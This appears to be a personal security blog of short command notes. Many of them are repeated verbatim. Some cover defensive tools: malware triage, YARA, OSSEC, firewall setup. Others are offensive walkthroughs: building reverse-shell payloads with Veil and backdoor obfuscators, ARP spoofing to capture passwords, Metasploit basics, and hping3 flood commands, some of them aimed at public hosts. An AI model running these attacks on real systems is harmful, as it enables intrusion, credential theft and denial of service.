Install Qemu and KVM:
#cd ~
#apt-get update
#apt-get install qemu-kvm qemu
#ln -s /usr/bin/qemu-system-x86_64 /bin/qemu
Install P7zip-full
#apt-get install p7zip-full
Install ZeroWine-Tryouts:
#cd /usr/local/sbin
#wget https://master.dl.sourceforge.net/project/zerowine-tryout/zerowine-tryout/0.0.2.x/Prebuilt%20QEMU%20Image/zerowine-tryout-alpha4.1-image.7z
#7za x ./zerowine-tryout-alpha4.1-image.7z
#cd zerowine_vm/
#chmod +x ./start_img.sh
Back up the default IMG file before using ZeroWine-Tryouts:
#cp ./zerowine.img ./zerowin.img.bak
Running ZeroWine-Tryouts:
#./start_img.sh
More Information:
The default username and password of ZeroWine-Tryouts are:
root:zerowine1
malware:malware1
Saturday, December 15, 2018
Friday, December 14, 2018
Basic Malware Checking - PART II - Using IDA Pro
IDA Pro's version: v 7.0
1) Go to "Options"->"General...", and check the options below:
Comments
Repeatable comments
Auto comments
2) Go to "View"->"Open subviews"->"Segments", and see if the application is packed.
3) Go to "View"->"Open subviews"->"Imports", and see if there is any risky API being used.
4) Go to "View"->"Open subviews"->"Strings", and see if there is any keyword suspicious.
1) Go to "Options"->"General...", and check the options below:
Comments
Repeatable comments
Auto comments
2) Go to "View"->"Open subviews"->"Segments", and see if the application is packed.
3) Go to "View"->"Open subviews"->"Imports", and see if there is any risky API being used.
4) Go to "View"->"Open subviews"->"Strings", and see if there is any keyword suspicious.
Tuesday, December 4, 2018
Install and run WINE
Install Wine:
#dpkg --add-architecture i386
#apt-get update
#apt-get install wine
#apt-get install winetricks
#apt-get install wine32
Configure Wine:
#winecfg
Execute applications through Wine:
#wine test.exe
#dpkg --add-architecture i386
#apt-get update
#apt-get install wine
#apt-get install winetricks
#apt-get install wine32
Configure Wine:
#winecfg
Execute applications through Wine:
#wine test.exe
Monday, December 3, 2018
Basic Malware Checking - PART I
1) Change the sample's name to some other extensions which cannot be executed by OS. For example:
#mv ./test.exe ./test.ex_
2) Use ClamAV and YARA to scan the test.ex_ file.
3) Check the hash of the test.ex_ file by using the command below:
#whois -h hash.cymru.com `md5sum ./test.ex_`
4) Utilize the strings command to see if there is any suspicious string sitting in the test.ex_ file as shown below:
strings ./test.ex_
5) Leverage the peid application to check if there is any packer with the test.ex_ file.
6) Check those imported APIs within the test.ex_ file by using the Dependency Walker(http://www.dependencywalker.com/).
#mv ./test.exe ./test.ex_
2) Use ClamAV and YARA to scan the test.ex_ file.
3) Check the hash of the test.ex_ file by using the command below:
#whois -h hash.cymru.com `md5sum ./test.ex_`
4) Utilize the strings command to see if there is any suspicious string sitting in the test.ex_ file as shown below:
strings ./test.ex_
5) Leverage the peid application to check if there is any packer with the test.ex_ file.
6) Check those imported APIs within the test.ex_ file by using the Dependency Walker(http://www.dependencywalker.com/).
Saturday, December 1, 2018
How to Prevent DDoS Attacks on a Cloud Server Using Open Source Software
How to Prevent DDoS Attacks on a Cloud Server Using Open Source Software: Author and Co-Founder of Pickaweb, Tony Messer is back to tell you how to Prevent DDoS Attacks on a Cloud Server Using Open Source Software.
Saturday, November 24, 2018
Compiling Python files
Compiling PY to EXE:
1) Utilize PIP to install PYINSTALLER:
>pip install pyinstaller
2) After the installation above is done, leverage PYINSTALLER command to compile PY files into a single EXE file as shown below:
>pyinstaller -F test.py
3) The final EXE file should be under the %pythonPath%\dist folder.
Compiling PY to Byte Code (i.e. pyc):
1) Place all compiled PY files into a folder.
2) Utilize CMD to enter the folder and execute the command below:
>python -m compileall
1) Utilize PIP to install PYINSTALLER:
>pip install pyinstaller
2) After the installation above is done, leverage PYINSTALLER command to compile PY files into a single EXE file as shown below:
>pyinstaller -F test.py
3) The final EXE file should be under the %pythonPath%\dist folder.
Compiling PY to Byte Code (i.e. pyc):
1) Place all compiled PY files into a folder.
2) Utilize CMD to enter the folder and execute the command below:
>python -m compileall
Monday, November 19, 2018
Install and run Phantom-Evasion
Phantom-Evasion is a backdoor obfuscator.
1) Use Veil to generate a shellcode:
#veil
veil>:use 2
veil>:list payloads
veil>:use rev_tcp
veil>:set BadChars \x00\x0a
veil>:set Encoder xor
veil>:set LHOST 192.168.0.15
veil>:set LPORT 4444
veil>:generate
Copy the shellcode just being generated.
2) Install and run Phantom-Evasion:
#cd ~
#mkdir ./phantom-evasion
#cd phantom-evasion/
#git clone https://github.com/oddcod3/Phantom-Evasion.git
#cd Phantom-Evasion
#chmod a+x ./phantom-evasion.py
#./phantom-evasion.py
1) Use Veil to generate a shellcode:
#veil
veil>:use 2
veil>:list payloads
veil>:use rev_tcp
veil>:set BadChars \x00\x0a
veil>:set Encoder xor
veil>:set LHOST 192.168.0.15
veil>:set LPORT 4444
veil>:generate
Copy the shellcode just being generated.
2) Install and run Phantom-Evasion:
#cd ~
#mkdir ./phantom-evasion
#cd phantom-evasion/
#git clone https://github.com/oddcod3/Phantom-Evasion.git
#cd Phantom-Evasion
#chmod a+x ./phantom-evasion.py
#./phantom-evasion.py
Setting up and executing Veil-Evasion
Veil-Evasion is also the backdoor generator helping generate undetectable backdoors.
Installation:
#apt-get update
#apt-get install veil-evasion
#veil
Execution:
#veil
Utilization:
Veil>: use 1
Veil/Evasion>: list
Veil/Evasion>: use 28
[python/meterpreter/rev_tcp>>]: set LHOST 192.168.0.150
[python/meterpreter/rev_tcp>>]: generate
[>] Please enter the base name for output files (default is payload): python_setupx86
[>] Please enter the number of your choice: 1
Installation:
#apt-get update
#apt-get install veil-evasion
#veil
Execution:
#veil
Utilization:
Veil>: use 1
Veil/Evasion>: list
Veil/Evasion>: use 28
[python/meterpreter/rev_tcp>>]: set LHOST 192.168.0.150
[python/meterpreter/rev_tcp>>]: generate
[>] Please enter the base name for output files (default is payload): python_setupx86
[>] Please enter the number of your choice: 1
Setting up and executing TheFatRat
The Fat Rat is the backdoor generator helping generate undetectable backdoors.
Installation:
#cd ~
#mkdir ./fatrat
#cd fatrat
#git clone https://github.com/Screetsec/TheFatRat.git
#cd TheFatRat
#chmod +x setup.sh && ./setup.sh
#chmod a+x ./fatrat
#chmod a+x ./powerfull.sh
Execution:
#./fatrat
Installation:
#cd ~
#mkdir ./fatrat
#cd fatrat
#git clone https://github.com/Screetsec/TheFatRat.git
#cd TheFatRat
#chmod +x setup.sh && ./setup.sh
#chmod a+x ./fatrat
#chmod a+x ./powerfull.sh
Execution:
#./fatrat
Sunday, November 11, 2018
Configure ufw
/* Installation: */
# apt-get update
# apt-get install ufw gufw
/* Enable ufw */
# ufw enable
/* Disable ufw */
# ufw disable
/* Add rules */
# ufw allow from 192.168.0.251
# ufw deny 80/tcp
/* Delete rules */
# ufw delete allow from 192.168.0.251
/* Reload ufw */
# ufw reload
/* Delet rules and disable ufw */
# ufw reset
/* Check current status */
# ufw status verbose
/* Check ufw logs */
# tail -n 30 -f /var/log/messages
/* Start on boot */
# vi /etc/rc.local
/usr/sbin/ufw enable
/usr/sbin/ufw allow from 192.168.0.251
/usr/sbin/ufw deny 80/tcp
/usr/sbin/ufw allow 79:81/tcp
/usr/sbin/ufw deny in on eth0
/usr/sbin/ufw allow out on eth0
[ESC]:ZZ
# apt-get update
# apt-get install ufw gufw
/* Enable ufw */
# ufw enable
/* Disable ufw */
# ufw disable
/* Add rules */
# ufw allow from 192.168.0.251
# ufw deny 80/tcp
/* Delete rules */
# ufw delete allow from 192.168.0.251
/* Reload ufw */
# ufw reload
/* Delet rules and disable ufw */
# ufw reset
/* Check current status */
# ufw status verbose
/* Check ufw logs */
# tail -n 30 -f /var/log/messages
/* Start on boot */
# vi /etc/rc.local
/usr/sbin/ufw enable
/usr/sbin/ufw allow from 192.168.0.251
/usr/sbin/ufw deny 80/tcp
/usr/sbin/ufw allow 79:81/tcp
/usr/sbin/ufw deny in on eth0
/usr/sbin/ufw allow out on eth0
[ESC]:ZZ
Friday, October 26, 2018
Install and use YARA at Linux
/*Install Yara*/
#apt-get update
#apt-get install yara
#which yara
/usr/bin/yara
/*Download Yara Rules*/
#cd /usr/local/sbin
#mkdir ./yararules
#cd yararules
#git clone https://github.com/Yara-Rules/rules.git
#ll /usr/local/sbin/yararules/rules
/*Execute Yara*/
#yara --help
YARA 3.8.1, the pattern matching swiss army knife.
Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
Mandatory arguments to long options are mandatory for short options too.
--atom-quality-table=FILE path to a file with the atom quality table
-c, --count print only number of matches
-d, --define=VAR=VALUE define external variable
--fail-on-warnings fail on warnings
-f, --fast-scan fast matching mode
-h, --help show this help and exit
-i, --identifier=IDENTIFIER print only rules named IDENTIFIER
-l, --max-rules=NUMBER abort scanning after matching a NUMBER of rules
--max-strings-per-rule=NUMBER set maximum number of strings per rule (default=10000)
-x, --module-data=MODULE=FILE pass FILE's content as extra data to MODULE
-n, --negate print only not satisfied rules (negate)
-w, --no-warnings disable warnings
-m, --print-meta print metadata
-D, --print-module-data print module data
-e, --print-namespace print rules' namespace
-S, --print-stats print rules' statistics
-s, --print-strings print matching strings
-L, --print-string-length print length of matched strings
-g, --print-tags print tags
-r, --recursive recursively search directories
-k, --stack-size=SLOTS set maximum stack size (default=16384)
-t, --tag=TAG print only rules tagged as TAG
-p, --threads=NUMBER use the specified NUMBER of threads to scan a directory
-a, --timeout=SECONDS abort scanning after the given number of SECONDS
-v, --version show version information
Send bug reports and suggestions to: vmalvarez@virustotal.com.
#yara -r -w -f -p 10 /usr/local/sbin/yararules/rules/index.yar /root 2>/dev/null
network_smtp_raw /root/test.pcap
Big_Numbers1 /root/test.pcap
sniff_lan /root/.config/wireshark/recent_common
with_sqlite /root/.local/share/evolution/addressbook/system/contacts.db
with_sqlite /root/.config/honeyd/names
Big_Numbers1 /root/md5_arpd.txt
vmdetect /root/.cache/gstreamer-1.0/registry.x86_64.bin
SurtrStrings /root/.cache/gstreamer-1.0/registry.x86_64.bin
Surtr /root/.cache/gstreamer-1.0/registry.x86_64.bin
with_sqlite /root/.cache/tracker/meta.db-wal
Friday, October 12, 2018
Using TCPKILL to send RST to cut off TCP connectivities
In Kali Linux, the tcpkill application is located at /usr/sbin/tcpkill.
Usage:
/usr/sbin/tcpkill -i NETWORK_INTERFACE -DEGREE TCPDUMP_FILTER_EXPRESSION
Example:
/usr/sbin/tcpkill -i eth0 -9 host 192.168.0.2 and host 192.168.3.10
NETWORK_INTERFACE is the network interface going to send out RST segments.
DEGREE is a number representing the rate of sending RST segments. The range of the number is from 1 to 9. The higher number, the faster rate. The filter expression of TCPDUMP can refer to the manual of TCPDUMP.
Usage:
/usr/sbin/tcpkill -i NETWORK_INTERFACE -DEGREE TCPDUMP_FILTER_EXPRESSION
Example:
/usr/sbin/tcpkill -i eth0 -9 host 192.168.0.2 and host 192.168.3.10
NETWORK_INTERFACE is the network interface going to send out RST segments.
DEGREE is a number representing the rate of sending RST segments. The range of the number is from 1 to 9. The higher number, the faster rate. The filter expression of TCPDUMP can refer to the manual of TCPDUMP.
Sunday, September 30, 2018
Let the Syscheck function of OSSEC check files' integrity for many times
1)#vi /var/ossec/etc/ossec.conf
2)Add the following line into the <syscheck></syscheck> labels:
<auto_ignore>no</auto_ignore>
3)Restart OSSEC
Tuesday, September 18, 2018
Install and configure OSSEC with Agentless mode
Install and configure OSSEC with Agentless mode
Author: demonalex (chaoyi.huang@connect.polyu.hk)
[Installing OSSEC]
#cd /usr/local/sbin
#wget https://github.com/ossec/ossec-hids/archive/2.9.3.tar.gz
#tar -zxvf ./2.9.3.tar.gz
#cd ossec-hids-2.9.3/
#./install.sh
[Initialize OSSEC's setting]
For English type : en
What kind of installation do you want (server,agent,local.hybrid): server
Choose wghere to install the OSSEC-HIDS [/var/ossec]: /var/ossec
Do you want email notification: n
Do you want to run the integrity check daemon: y
Do you want to run the rootkit detection engine: y
Do you want to enable active response: n
Do you want to enable remote syslog (port 514 udp): y
[Primary files]
/var/ossec/bin/ossec-control #Main Application
/var/ossec/etc/ossec.conf #Main Configuration File
/var/ossec/bin/manage_agents #Agent Management Program
/var/ossec/agentless/register_host.sh #Agentless Host Registration Program
/var/ossec/logs/ossec.log #Main Log File
/var/ossec/logs/alerts/alerts.log #Alert Log File
[Executing OSSEC]
#/var/ossec/bin/ossec-control start
#ps -aef|grep ossec
ossec 747 1 0 May11 ? 00:01:03 /var/ossec/bin/ossec-analysisd
root 753 1 0 May11 ? 00:04:50 /var/ossec/bin/ossec-logcollector
root 765 1 0 May11 ? 01:18:33 /var/ossec/bin/ossec-syscheckd
ossec 789 1 0 May11 ? 00:00:08 /var/ossec/bin/ossec-monitord
[Adding more agents]
#/var/ossec/agentless/register_host.sh add root@192.168.1.189
After entering the password associated with the agent, utilize the following command to show the agent just added in the system.
#/var/ossec/agentless/register_host.sh list
*Available hosts:
root@192.168.1.189
[Configuring the Agentless mode]
#vi /var/ossec/etc/ossec.conf
Add the following content between <ossec_config> and </ossec_config> before saving and exiting VI:
<agentless>
<type>ssh_integrity_check_linux</type>
<frequency>3600</frequency>
<host>root@192.168.1.189</host>
<state>periodic</state>
<arguments>/bin /etc/ /sbin</arguments>
</agentless>
<agentless>
<type>ssh_generic_diff</type>
<frequency>3600</frequency>
<host>root@192.168.1.189</host>
<state>periodic_diff</state>
<arguments>ls -la /etc; cat /etc/passwd</arguments>
</agentless>
[Restarting OSSEC with Agentless mode]
#/var/ossec/bin/ossec-control enable agentless
#/var/ossec/bin/ossec-control restart
#ps -aef|grep -i ossec
ossec 21845 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-agentlessd
ossec 21855 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-analysisd
root 21859 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-logcollector
ossecr 21866 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-remoted
root 21871 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-syscheckd
ossec 21875 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-monitord
[Configuring Remote Syslog Pushing]
#vi /var/ossec/etc/ossec.conf
Add the following content between <ossec_config> and </ossec_config> before saving and exiting VI:
<syslog_output>
<server>192.168.1.35</server>
<port>115</port>
</syslog_output>
[Restarting OSSEC with Syslog Pushing]
#/var/ossec/bin/ossec-control enable client-syslog
#/var/ossec/bin/ossec-control restart
[Checking if there is any issue]
#tail -n 10 -f /var/ossec/logs/ossec.log
[Checking the detail of any alert]
#tail -n 30 -f /var/ossec/logs/alerts/alerts.log
[Setting up update-rc.d]
#update-rc.d ossec enable 3 5
Author: demonalex (chaoyi.huang@connect.polyu.hk)
[Installing OSSEC]
#cd /usr/local/sbin
#wget https://github.com/ossec/ossec-hids/archive/2.9.3.tar.gz
#tar -zxvf ./2.9.3.tar.gz
#cd ossec-hids-2.9.3/
#./install.sh
[Initialize OSSEC's setting]
For English type : en
What kind of installation do you want (server,agent,local.hybrid): server
Choose wghere to install the OSSEC-HIDS [/var/ossec]: /var/ossec
Do you want email notification: n
Do you want to run the integrity check daemon: y
Do you want to run the rootkit detection engine: y
Do you want to enable active response: n
Do you want to enable remote syslog (port 514 udp): y
[Primary files]
/var/ossec/bin/ossec-control #Main Application
/var/ossec/etc/ossec.conf #Main Configuration File
/var/ossec/bin/manage_agents #Agent Management Program
/var/ossec/agentless/register_host.sh #Agentless Host Registration Program
/var/ossec/logs/ossec.log #Main Log File
/var/ossec/logs/alerts/alerts.log #Alert Log File
[Executing OSSEC]
#/var/ossec/bin/ossec-control start
#ps -aef|grep ossec
ossec 747 1 0 May11 ? 00:01:03 /var/ossec/bin/ossec-analysisd
root 753 1 0 May11 ? 00:04:50 /var/ossec/bin/ossec-logcollector
root 765 1 0 May11 ? 01:18:33 /var/ossec/bin/ossec-syscheckd
ossec 789 1 0 May11 ? 00:00:08 /var/ossec/bin/ossec-monitord
[Adding more agents]
#/var/ossec/agentless/register_host.sh add root@192.168.1.189
After entering the password associated with the agent, utilize the following command to show the agent just added in the system.
#/var/ossec/agentless/register_host.sh list
*Available hosts:
root@192.168.1.189
[Configuring the Agentless mode]
#vi /var/ossec/etc/ossec.conf
Add the following content between <ossec_config> and </ossec_config> before saving and exiting VI:
<agentless>
<type>ssh_integrity_check_linux</type>
<frequency>3600</frequency>
<host>root@192.168.1.189</host>
<state>periodic</state>
<arguments>/bin /etc/ /sbin</arguments>
</agentless>
<agentless>
<type>ssh_generic_diff</type>
<frequency>3600</frequency>
<host>root@192.168.1.189</host>
<state>periodic_diff</state>
<arguments>ls -la /etc; cat /etc/passwd</arguments>
</agentless>
[Restarting OSSEC with Agentless mode]
#/var/ossec/bin/ossec-control enable agentless
#/var/ossec/bin/ossec-control restart
#ps -aef|grep -i ossec
ossec 21845 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-agentlessd
ossec 21855 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-analysisd
root 21859 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-logcollector
ossecr 21866 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-remoted
root 21871 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-syscheckd
ossec 21875 1 0 16:47 ? 00:00:00 /var/ossec/bin/ossec-monitord
[Configuring Remote Syslog Pushing]
#vi /var/ossec/etc/ossec.conf
Add the following content between <ossec_config> and </ossec_config> before saving and exiting VI:
<syslog_output>
<server>192.168.1.35</server>
<port>115</port>
</syslog_output>
[Restarting OSSEC with Syslog Pushing]
#/var/ossec/bin/ossec-control enable client-syslog
#/var/ossec/bin/ossec-control restart
[Checking if there is any issue]
#tail -n 10 -f /var/ossec/logs/ossec.log
[Checking the detail of any alert]
#tail -n 30 -f /var/ossec/logs/alerts/alerts.log
[Setting up update-rc.d]
#update-rc.d ossec enable 3 5
Friday, September 14, 2018
Log in SSH server with Passwordless mode.
[On the client side:]
1)
#ssh-keygen -t rsa
Keep pressing [ENTER] button until the end.
2)
#ssh-copy-id -i $HOME/.ssh/id_rsa.pub root@192.168.0.3:
The IP address shown above, namely 192.168.0.3, refers to the server's IP address.
3)
Done!
Friday, August 10, 2018
Utilizing WMI to execute Windows commands remotely at Kali Linux
Usage:
/usr/share/doc/python-
Example:
/usr/share/doc/python-
Friday, July 6, 2018
Detect whether Sniffer exists in your network.
Nmap can be a tool to verify whether there is any sniffer running in your network.
Here is an example of using Nmap to address the sniffer, and 192.168.30.29 is the PC hosting a sniffer.
root@is:~# nmap -sn --script=sniffer-detect 192.168.30.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2018-07-06 11:27 EDT
Nmap scan report for 192.168.30.1
Host is up (0.025s latency).
MAC Address: 00:24:C4:92:C3:21 (Cisco Systems)
Host script results:
|_sniffer-detect: Unknown (tests: "________")
Nmap scan report for 192.168.30.29
Host is up (0.069s latency).
MAC Address: 9C:4E:36:9E:36:2C (Intel Corporate)
Nmap scan report for 192.168.30.128
Host is up (0.024s latency).
MAC Address: EC:88:92:72:20:8C (Motorola Mobility, a Lenovo Company)
Host script results:
|_sniffer-detect: Unknown (tests: "_______1")
Nmap done: 256 IP addresses (3 hosts up) scanned in 12.06 seconds
Here is an example of using Nmap to address the sniffer, and 192.168.30.29 is the PC hosting a sniffer.
root@is:~# nmap -sn --script=sniffer-detect 192.168.30.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2018-07-06 11:27 EDT
Nmap scan report for 192.168.30.1
Host is up (0.025s latency).
MAC Address: 00:24:C4:92:C3:21 (Cisco Systems)
Host script results:
|_sniffer-detect: Unknown (tests: "________")
Nmap scan report for 192.168.30.29
Host is up (0.069s latency).
MAC Address: 9C:4E:36:9E:36:2C (Intel Corporate)
Nmap scan report for 192.168.30.128
Host is up (0.024s latency).
MAC Address: EC:88:92:72:20:8C (Motorola Mobility, a Lenovo Company)
Host script results:
|_sniffer-detect: Unknown (tests: "_______1")
Nmap done: 256 IP addresses (3 hosts up) scanned in 12.06 seconds
Thursday, July 5, 2018
Performing ARP SPOOFING/POISONING on Kali Linux #2
1) Enable "net.ipv4.conf.all.forwarding" by executing the command below.
#sysctl net.ipv4.conf.all.forwarding=1
2) Run the "ettercap-graphical".
3) Click "Sniff"->"Unified sniffing...". When a small window pops up, choose the appropriate network adapter as the "Network interface" before tapping the "OK" button.
4) Click "Hosts"->"Scan for hosts".
5) Click "Mitm"->"ARP poisoning...". When a small window shows up, check "Sniff remote connections." before clicking the "OK" button.
6) Finally, tap "Start"->"Start sniffing".
7) Any usernames and passwords will show up on the bottom of the ettercap window if any.
#sysctl net.ipv4.conf.all.forwarding=1
2) Run the "ettercap-graphical".
3) Click "Sniff"->"Unified sniffing...". When a small window pops up, choose the appropriate network adapter as the "Network interface" before tapping the "OK" button.
4) Click "Hosts"->"Scan for hosts".
5) Click "Mitm"->"ARP poisoning...". When a small window shows up, check "Sniff remote connections." before clicking the "OK" button.
6) Finally, tap "Start"->"Start sniffing".
7) Any usernames and passwords will show up on the bottom of the ettercap window if any.
Performing ARP SPOOFING/POISONING on Kali Linux #1
1) Utilize the "netdiscover" command to address those nodes located in the same subnet. An example:
#netdiscover -i wlan0 -r 192.168.0.0/24
P.S.: The "wlan0" is the corresponding network adapter, and "192.168.0.0/24" is the corresponding subnet.
2) Enable "net.ipv4.conf.all.forwarding" by executing the command below.
#sysctl net.ipv4.conf.all.forwarding=1
3) Leverage the "arpspoof" command to perform ARP SPOOFING. An example is shown below.
#arpspoof -i wlan0 -t 192.168.0.7 -r 192.168.0.1
P.S.: The "wlan0" is the corresponding network adapter, and "192.168.0.7" is the target IP address. Furthermore, "192.168.0.1" is the gateway.
4) After the commands above are executed, run the Wireshark so that such confidential information as passwords can be gathered by us.
#netdiscover -i wlan0 -r 192.168.0.0/24
P.S.: The "wlan0" is the corresponding network adapter, and "192.168.0.0/24" is the corresponding subnet.
2) Enable "net.ipv4.conf.all.forwarding" by executing the command below.
#sysctl net.ipv4.conf.all.forwarding=1
3) Leverage the "arpspoof" command to perform ARP SPOOFING. An example is shown below.
#arpspoof -i wlan0 -t 192.168.0.7 -r 192.168.0.1
P.S.: The "wlan0" is the corresponding network adapter, and "192.168.0.7" is the target IP address. Furthermore, "192.168.0.1" is the gateway.
4) After the commands above are executed, run the Wireshark so that such confidential information as passwords can be gathered by us.
Wednesday, July 4, 2018
WIFI Security Inspection Checklist
1) The security of Access Points and Access Controllers
Connect into the corresponding wlan before leveraging either Nessus or OpenVAS to fully scan those Access Points and Access Controllers.
2) The robustness of Wireless protocols
Run Kismet by executing the command, kismet, in a shell.
Manually check the encryption algorithm of each WIFI signal.
Bear in mind that there is a sequence listing the security robustness towards each of those WIFI protocols as shown below.
WPA2 Enterprise > WPA Enterprise > WPA2 PSK > WPA PSK > WEP > None Encryption
3) Wi-Fi Protected Setup (WPS) function
Run Fern WIFI Cracker and select the appropriate wlan0 interface before clicking the "Scan for Access points" button.
Check each access point and see if each of them enables the WPS function.
4) Rogue AP
Run Kismet by executing the command, kismet, in a shell.
Check all signals stronger than -40dBm while walking around.
5) Twins of Evil
Run the command, iwlist wlan0 scanning|grep -i 'address:\|essid:'.
There is an example as shown below.
root@alex-kali:~# iwlist wlan0 scanning|grep -i 'address:\|essid:'
Cell 01 - Address: 90:2B:CF:DC:09:15
ESSID:"alex11"
Cell 02 - Address: 80:29:94:D2:2A:1C
ESSID:"Highbridge26"
Cell 03 - Address: 00:26:62:9B:47:87
ESSID:"E5426"
Cell 04 - Address: B0:C2:87:B5:2B:79
ESSID:"TC8717T73"
Cell 05 - Address: 90:1A:CA:DC:12:10
ESSID:"alex6"
Cell 06 - Address: 00:14:D1:D4:64:02
ESSID:"ling23828"
Cell 07 - Address: 58:EF:68:60:C9:87
ESSID:"Linksys15"
Cell 08 - Address: 48:5D:36:56:44:0E
ESSID:"FiOS-TQ4TB"
Cell 09 - Address: 48:5D:36:21:6D:BA
ESSID:"FiOS-Q9BY2"
Cell 10 - Address: D8:D7:75:A8:59:5E
ESSID:"MySpectrumWiFi58-2G"
Cell 11 - Address: 80:29:94:D2:2A:1D
ESSID:"Highbridge23"
Cell 12 - Address: 58:EF:68:60:C9:88
ESSID:"Linksys15"
Cell 13 - Address: 58:EF:68:60:C9:89
ESSID:"Linksys15"
Cell 14 - Address: 20:C0:47:D3:4D:CA
ESSID:"Fios-DRARW-5G"
Cell 15 - Address: 22:C0:47:D3:4D:CB
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 16 - Address: 48:5D:36:56:44:0C
ESSID:"FiOS-TQ4TB-5G"
Cell 17 - Address: 4A:5D:36:56:44:0D
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 18 - Address: B8:D9:4D:4B:AA:0F
ESSID:"MySpectrumWiFi08-5G"
Check the output in order to filter out those Twins of Evil.
Connect into the corresponding wlan before leveraging either Nessus or OpenVAS to fully scan those Access Points and Access Controllers.
2) The robustness of Wireless protocols
Run Kismet by executing the command, kismet, in a shell.
Manually check the encryption algorithm of each WIFI signal.
Bear in mind that there is a sequence listing the security robustness towards each of those WIFI protocols as shown below.
WPA2 Enterprise > WPA Enterprise > WPA2 PSK > WPA PSK > WEP > None Encryption
3) Wi-Fi Protected Setup (WPS) function
Run Fern WIFI Cracker and select the appropriate wlan0 interface before clicking the "Scan for Access points" button.
Check each access point and see if each of them enables the WPS function.
4) Rogue AP
Run Kismet by executing the command, kismet, in a shell.
Check all signals stronger than -40dBm while walking around.
5) Twins of Evil
Run the command, iwlist wlan0 scanning|grep -i 'address:\|essid:'.
There is an example as shown below.
root@alex-kali:~# iwlist wlan0 scanning|grep -i 'address:\|essid:'
Cell 01 - Address: 90:2B:CF:DC:09:15
ESSID:"alex11"
Cell 02 - Address: 80:29:94:D2:2A:1C
ESSID:"Highbridge26"
Cell 03 - Address: 00:26:62:9B:47:87
ESSID:"E5426"
Cell 04 - Address: B0:C2:87:B5:2B:79
ESSID:"TC8717T73"
Cell 05 - Address: 90:1A:CA:DC:12:10
ESSID:"alex6"
Cell 06 - Address: 00:14:D1:D4:64:02
ESSID:"ling23828"
Cell 07 - Address: 58:EF:68:60:C9:87
ESSID:"Linksys15"
Cell 08 - Address: 48:5D:36:56:44:0E
ESSID:"FiOS-TQ4TB"
Cell 09 - Address: 48:5D:36:21:6D:BA
ESSID:"FiOS-Q9BY2"
Cell 10 - Address: D8:D7:75:A8:59:5E
ESSID:"MySpectrumWiFi58-2G"
Cell 11 - Address: 80:29:94:D2:2A:1D
ESSID:"Highbridge23"
Cell 12 - Address: 58:EF:68:60:C9:88
ESSID:"Linksys15"
Cell 13 - Address: 58:EF:68:60:C9:89
ESSID:"Linksys15"
Cell 14 - Address: 20:C0:47:D3:4D:CA
ESSID:"Fios-DRARW-5G"
Cell 15 - Address: 22:C0:47:D3:4D:CB
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 16 - Address: 48:5D:36:56:44:0C
ESSID:"FiOS-TQ4TB-5G"
Cell 17 - Address: 4A:5D:36:56:44:0D
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 18 - Address: B8:D9:4D:4B:AA:0F
ESSID:"MySpectrumWiFi08-5G"
Check the output in order to filter out those Twins of Evil.
Tuesday, May 29, 2018
Some basic commands for Metasploit Msfconsole
Search for module:
msf > search [regex]
Show all Exploits:
msf > show exploits
Specify and exploit to use:
msf > use [ExploitPath]
Show all Payloads:
msf > show payloads
Specify a Payload to use:
msf > set payload [PayloadPath]
Show all Targets:
msf > show targets
Specify a Target to use:
msf > set target [TargetNumber]
Show all Encoders:
msf > show encoders
Specify a Encoder to use:
msf > set encoder [EncoderPath]
Show options for the current modules:
msf > show options
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit
msf > run
msf > search [regex]
Show all Exploits:
msf > show exploits
Specify and exploit to use:
msf > use [ExploitPath]
Show all Payloads:
msf > show payloads
Specify a Payload to use:
msf > set payload [PayloadPath]
Show all Targets:
msf > show targets
Specify a Target to use:
msf > set target [TargetNumber]
Show all Encoders:
msf > show encoders
Specify a Encoder to use:
msf > set encoder [EncoderPath]
Show options for the current modules:
msf > show options
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit
msf > run
Saturday, May 26, 2018
Utilizing Hping3 to launch Denial of Service (DoS) attacks
Documenting this post is for a convenient purpose. However, it does not cover some typical Denial of Service (DoS) attacks such as Ping of Death and Teardrop.
SYN Flood:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Source Port) --flood --rand-source (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 1025 --flood --rand-source test.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
--flood:Flood Mode
--rand-source:IP Spoofing
UDP Flood:
hping3 --flood --rand-source --udp -p (Victim Port) (Victim IP)
Example:
hping3 --flood --rand-source --udp -p 53 8.8.4.4
Explanation:
--flood:Flood Mode
--rand-source:IP Spoofing
--udp:UDP Mode
-p:Destination Port
ICMP Flood:
hping3 -1 --flood --rand-source (Victim IP)
Example:
hping3 -1 --flood --rand-source 192.168.0.88
-1:ICMP
--flood:Flood Mode
--rand-source:IP Spoofing
Smurf:
hping3 -1 --flood -a (Victim IP) (Broadcast IP)
Example:
hping3 -1 --flood -a 192.168.0.3 192.168.0.255
Explanation:
-1:ICMP
--flood:Flood Mode
-a:The Source IP or Host
Fraggle:
hping3 --udp --flood -p 7 -s 7 -k -a (Victim IP) (Broadcast IP)
Example:
hping3 --udp --flood -p 7 -s 7 -k -a 192.168.0.3 192.168.0.255
Explanation:
--udp:UDP
--flood:Flood Mode
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
